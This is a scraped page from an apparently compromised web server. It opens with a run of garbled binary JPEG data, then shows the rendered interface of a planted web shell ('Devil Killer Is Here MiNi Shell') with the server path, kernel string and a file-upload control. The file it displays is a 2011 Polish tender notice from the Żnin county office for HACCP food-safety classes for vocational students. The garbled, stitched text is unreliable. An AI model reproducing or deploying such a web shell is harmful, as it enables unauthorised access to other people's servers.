JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111208/323845-N-2011.html

<p class="kh_header"><b>Żnin: Przeprowadzenie zajęć pozaszkolnych  pt.  Bezpieczeństwo żywności z HACCP i GHP dla 45 uczniów techników i szkół zawodowych Powiatu Żnińskiego biorących udział w projekcie Nowa jakość kształcenia zawodowego w Powiecie Żnińskim współfinansowanym ze środków Europejskiego Funduszu Społecznego w ramach działania 9.2 Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 323845 - 2011; data zamieszczenia: 08.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Żninie , ul. Potockiego 1, 88-400 Żnin, woj. kujawsko-pomorskie, tel. 052 3031100, faks 052 3031302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.znin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć pozaszkolnych  pt.  Bezpieczeństwo żywności z HACCP i GHP dla 45 uczniów techników i szkół zawodowych Powiatu Żnińskiego biorących udział w projekcie Nowa jakość kształcenia zawodowego w Powiecie Żnińskim współfinansowanym ze środków Europejskiego Funduszu Społecznego w ramach działania 9.2 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Szczegółowy opis przedmiotu zamówienia:
2.1. Celem zajęć Bezpieczeństwo żywności z HACCP i GHP jest nabycie przez uczniów wiedzy teoretycznej i umiejętności praktycznych zasad wprowadzania systemu HARCAP oraz nauka dobrych praktyk higienicznych i żywieniowych w zakładach pracy.
2.2.Uczestnicy zajęć: łączna liczba uczestników zajęć wyniesie 45 uczniów techników i szkół zawodowych o profilach żywnościowych i rolniczych. Zajęcia odbywać się będą w 4 grupach zajęciowych. Rekrutacja uczestników zajęć leży w gestii Zamawiającego. Listy rekrutacyjne Wykonawca otrzyma od Zamawiającego przed rozpoczęciem pierwszych zajęć.
2.3.Termin przeprowadzenia zajęć: zajęcia powinny się rozpocząć nie wcześniej niż 2 stycznia 2012r., i zakończyć nie później niż do 30 czerwca 2012r.
2.4.Miejsce prowadzenia zajęć: Zajęcia powinny się odbywać w salach lekcyjnych szkół ponadgimnazjalnych Powiatu Żnińskiego tj.:
- w Zespole Szkół Ponadgimnazjalnych w Żninie, ul. Browarowa 14 - 1 grupa
- w Zespole Szkół Ponadgimnazjalnych w Gąsawie, ul. Żnińska 8 - 1 grupa
- w Zespole Szkół Ponadgimnazjalnych w Piechcinie, ul. Radłowska 10 - 1 grupa
- w Zespole Szkół Ponadgimnazjalnych w Łabiszynie, ul 3 Maja 30 - 1 grupa
Sale lekcyjne zostaną udostępnione Wykonawcy nieodpłatnie.
2.5.Szczegółowe wymagania Zamawiającego wobec Wykonawcy w ramach realizacji niniejszego zamówienia: 
2.5.1.Zakres przedmiotowych zajęć powinien być realizowany z uwzględnieniem posiadanej przez uczestników wiedzy i podbudowy merytorycznej, zatem program nauczania powinien być dostosowany do praktycznych i teoretycznych umiejętności uczestników.
2.5.2.Zajęcia powinna prowadzić osoba posiadająca uprawnienia auditora systemu zarządzania jakością i bezpieczeństwa żywności
2.5.3.Zajęcia mają obejmować 30 godzin dydaktycznych na grupę (godzina dydaktyczna - 45 minut) i powinny być realizowane poprzez 2- lub 3- godzinne spotkania. 
2.5.4.W ramach 30 godzin zajęć Wykonawca zagwarantuje uczestnikom co najmniej 5 godzin zajęć praktycznych polegających na wizycie studyjnej w zakładzie pracy o profilu spożywczym posiadającym Certyfikat HACCP, z zastrzeżeniem, że lokalizacja ww. zakładu powinna mieścić się w województwie kujawsko-pomorskim. Wykonawca zagwarantuje na własny koszt:
- Pobyt i zajęcia na terenie zakładu pracy
- Transport
- Dwudaniowy obiad dla uczestników
- Opiekunów w liczbie co najmniej 1 osoby na 15 uczniów
- Ubezpieczenie OC i NNW uczniów
2.5.5.Uczestnik musi być zapoznany z takimi  zagadnieniami jak: 
- Zasady Dobrej Praktyki Higienicznej GHP
-źródła zanieczyszczeń mikrobiologicznych i chemicznych żywności
- choroby przenoszone drogą pokarmową, zatrucia pokarmowe oraz czynniki, które je wywołują, zagadnienie zapobiegania zatruciom pokarmowym
- zasady racjonalnego żywienia - wpływ żywienia na zdrowie
- Zasady wewnętrznej kontroli HACCP 
-Europejskie i krajowe regulacje prawne dotyczące wdrażania systemu HACCP
-HACCP - podstawowe pojęcia i definicje 
-Pochodzenie i cele systemu HACCP 
-Zasady i etapy tworzenia systemu HACCP 
-Dokumentacje systemu HACCP 
-Wdrażanie i weryfikacja systemu 
-Wady i zalety systemu i jego powiązania z innymi systemami jakości
2.5.6.Wykonawca przed podpisaniem umowy zobowiązany jest przedstawić szczegółowy program tematyczny zajęć w podziale na liczbę godzin poświęconą poszczególnym zagadnieniom.
2.5.7.Zajęcia muszą być dostosowane do planu obowiązkowych zajęć dydaktycznych w szkołach, w których są prowadzone. Zajęcia powinny odbywać się od poniedziałku do piątku - nie dłużej niż do godziny 19.00. Zamawiający dopuszcza możliwość  organizacji zajęć w soboty, nie dłużej jednak niż do godziny 14.00. Harmonogram zajęć Wykonawca uzgodni z uczestnikami zajęć w każdej z 4 grup i przedstawi jego rozkład Zamawiającemu w formie elektronicznej i pisemnej.
2.5.8.Wykonawca zobowiązany jest do zapewnienia uczestnikom kursu podręczników oraz wszelkich materiałów dydaktycznych niezbędnych do przeprowadzenia zajęć po jednym egzemplarzu dla każdego uczestnika. Kopie opracowanych własnych materiałów dydaktycznych Wykonawca przekaże Zamawiającemu w celu udokumentowania procesu dydaktycznego.
2.5.9.Wykonawca przeprowadzi wśród uczestników badanie poziomu wiedzy na temat zaadnień będących przedmiotem zajęć: na początku (badanie na wejście) i na końcu (na wyjście) zajęć. Wyniki tych badań należy przekazać Zamawiającemu.
2.5.10.Wykonawca zobowiązany jest do prowadzenia dziennika zajęć wypełnianego zgodnie z programem zajęć, wymiarem godzin oraz tematyką zajęć, list obecności, list odbioru materiałów dydaktycznych.
2.5.11.Wykonawca zobowiązany jest do bieżącego pisemnego informowania Biuro Projektu o nieobecności uczestników na zajęciach lub o rezygnacji z uczestnictwa w zajęciach w trakcie ich trwania.
2.5.12.Wykonawca zobowiązany jest do udostępniania podczas kontroli Zamawiającemu i innym organom do tego upoważnionym wglądu do dokumentów potwierdzających realizację i jakość przeprowadzonego zajęć.
2.5.13.Ukończenie zajęć musi być potwierdzone stosownym zaświadczeniem/certyfikatem wystawionym przez Wykonawcę, potwierdzającym ich ukończenie oraz potwierdzającym pozytywne zaliczenie egzaminu. Zaświadczenie powinno zawierać co najmniej następujące informacje i oznaczenia: 
-pieczęć organizatora,
-tytuł: Zaświadczenie o ukończeniu
-imię i nazwisko uczestnika,
-data urodzenia, miejsce urodzenia, województwo,
-nazwa formy kształcenia,
-nazwę organizatora kształcenia,
-termin realizacji zajęć,
-cel zajęć, 
-miejsce i datę wydania,
-nr z rejestru
-pieczęć i podpis osoby upoważnionej przez organizatora kształcenia
-nazwę zajęć edukacyjnych,
-wymiar godzin zajęć edukacyjnych,
-pieczęć imienną i podpis osoby upoważnionej przez organizatora kształcenia,
-logo Programu Operacyjnego Kapitał Ludzki,
-logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej 
i Europejskiego Funduszu Społecznego
-zapis Projekt Nowa jakość kształcenia zawodowego w Powiecie Żnińskim współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.         
                
2.5.14.W przypadku gdy nie ma możliwości spełnienia powyższych wymogów (np. zajęcia  kończą się wydaniem świadectwa na formularzu według wzoru Ministerstwa Edukacji Narodowej), uczestnicy powinni otrzymać dodatkowe dyplomy spełniające powyższe wymogi informacyjne.
2.5.15.Wykonawca  zobowiązany jest przekazać do Biura Projektu wymaganą dokumentację dydaktyczną w terminie 7 dni po ukończeniu zajęć (dzienniki zajęć, listy obecności i odbioru - w oryginale, zaświadczenia-certyfikaty i inne - w postaci uwierzytelnionych kopii).

2.5.16.Wykonawca  zobowiązany jest do umieszczenia wymaganego logotypu na dokumentach i materiałach promocyjnych, edukacyjnych i szkoleniowych związanych z organizacją zajęć, zgodnie z zasadami określonymi w treści wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (logo Programu Kapitał Ludzki, logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego powinno zostać umieszczone na wszystkich dokumentach i materiałach dydaktycznych związanych z organizacją zajęć, w tym również w miejscu realizacji powinna być stosowana zasada wizualizacji).
2.5.17.Wykonawca zobowiązany jest na swój koszt do ubezpieczenia uczestników zajęć od następstw nieszczęśliwych wypadków powstałych w związku z prowadzeniem zajęć. 
2.5.18.Koszt usługi powinien uwzględniać przygotowanie i przeprowadzenie zajęć, materiałów dydaktycznych, dojazd prowadzących zajęcia, koszt  egzaminu kończącego się certyfikatem.
2.6.Zamawiający wyposaży każdego uczestnika zajęć w:
- zestaw: długopis, brulion A4, teczka
- komplet dydaktyczny. Dokumentacja HACCP wzorcowa wersja CD-ROM
- Praktyczny poradnik wdrażania systemu HACCP -  producenci żywności, autorstwa  Haliny  Turlejskiej, Wydawnictwo ODDiK.   Pozostały sprzęt i materiały dydaktyczne zapewnia Wykonawca.
2.7.Dodatkowo Wykonawca otrzyma po jednym dzienniku zajęć na grupę, który będzie zobowiązany wypełniać a po wykonaniu zadania - zwrócić zamawiającemu. 
2.8.Zamawiający zapewni uczestnikom zajęć poczęstunek (kawa, herbata, napoje i ciastka), których dysponentem wg potrzeb będzie Wykonawca. 
2.9.Zamawiający przewiduje nagrody książkowe dla najlepszych uczestników zajęć  (po 1 uczestniku z każdej grupy zajęciowej), których zakup leży w gestii Zamawiającego. 
2.10.Zamawiający zastrzega sobie prawo do:
- Dokonania kontroli przez upoważnionych przedstawicieli Zamawiającego w zakresie przebiegu  i sposobu prowadzenia zajęć, a także uczestnictwa w ocenie końcowej uczestników zajęć,
- Dokonania oceny zajęć przez uczestników poprzez wykorzystanie do tego celu ankiet  dostarczonych przez Zamawiającego.
2.11.Wykonawca zobowiązuje się do przechowywania dokumentacji związanej z realizacją przedmiotu zamówienia do dnia 31 grudnia 2020r. w sposób zapewniający dostępność, poufność i bezpieczeństwo oraz do informowania Zamawiającego o miejscu archiwizacji dokumentów związanych z realizacją przedmiotu zamówienia.
2.12.Wykonawca zobowiązuje się również do udostępnienia do wglądu Zamawiającemu oraz innym podmiotom upoważnionym do kontroli projektu wszystkich dokumentów związanych z realizacją przedmiotu zamówienia, w tym dokumentów elektronicznych, przez cały okres ich przechowywania. 
2.13.Wykonawca przy realizacji przedmiotu zamówienia musi przestrzegać przepisów zawartych w Wytycznych w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki - w części dotyczącej zasad zatrudniania personelu projektu oraz Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, zgodnie z zawartą umową.
2.14.Zamawiający żąda wskazania w ofercie przez Wykonawcę czy daną część zamówienia  wykonawca powierzy podwykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od wykonawców wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy oraz na podstawie złożonego oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę wpisu do rejestru instytucji szkoleniowych, prowadzony przez właściwy - dla siedziby jednostki szkoleniowej - wojewódzki urząd pracy lub wpisu do ewidencji szkół i placówek niepublicznych o uprawnieniach publicznych (w przypadku placówek niepublicznych) lub aktualnego aktu  założycielskiego (w przypadku placówek publicznych),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy oraz na podstawie złożonego wykazu wykonanych (a w przypadku świadczeń okresowych lub ciągłych również wykonywanych) w okresie 3 lat przed upływem terminu ofert (a jeżeli okres działalności jest krótszy - w tym okresie), dwóch usług szkoleniowych, w ramach których przeszkolono co najmniej po 20 osób w zakresie odpowiadającym rodzajem przedmiotowi zamówienia. Do każdej usługi wskazanej w wykazie należy przedstawić dokument potwierdzający, że ta usługa została  wykonana (lub jest wykonywana) należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy oraz na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresem wykonywanych przez nie czynności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Pełnomocnictwo (w oryginale) do reprezentowania podmiotów występujących wspólnie (konsorcja, spółki  cywilne) o przedmiotowe  zamówienie, określające zakres udzielonego pełnomocnictwa (pełnomocnik winien  być powołany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie).</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego z uwzględnieniem istotnych dla stron postanowień, które zostaną wprowadzone do treści zawieranej umowy, określone we wzorze umowy stanowiącym załącznik nr 5 do siwz.
2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy za wyjątkiem sytuacji określonych w ust. 3 niniejszego rozdziału.
3. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych warunków:
a)powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
b)zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia, Zamawiający dopuszcza możliwość zmiany umowy, w szczególności termin realizacji zamówienia.
c)wystąpienia w trakcie realizacji zamówienia zmian przepisów prawa Unii Europejskiej lub prawa krajowego, co wpłynie na realizację zamówienia i spowoduje konieczność dostosowania opracowania do zmian przepisów
4. W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień  umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.
5. Wykonawca nie może dokonywać żadnych zmian w projekcie umowy i zobowiązuje się do jej podpisania, gdy zostanie wybrany na wykonawcę niniejszego zamówienia.
6. Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
7. Jeżeli Wykonawca, którego oferta została wybrana, uchyla się od zawarcia umowy w sprawie zamówienia publicznego lub nie wnosi  wymaganego zabezpieczenia należytego wykonania umowy, Zmawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert, bez przeprowadzania ich ponownego badania i oceny, chyba że zachodzą przesłanki unieważnienia postępowania, o których mowa w art. 93 ust. 1.
8. Zmiana  umowy musi być zgodna z art. 144  ustawy Prawo zamówień publicznych oraz wymaga formy pisemnej pod rygorem nieważności.
9. Odstąpienie od  umowy przez Zamawiającego może nastąpić:
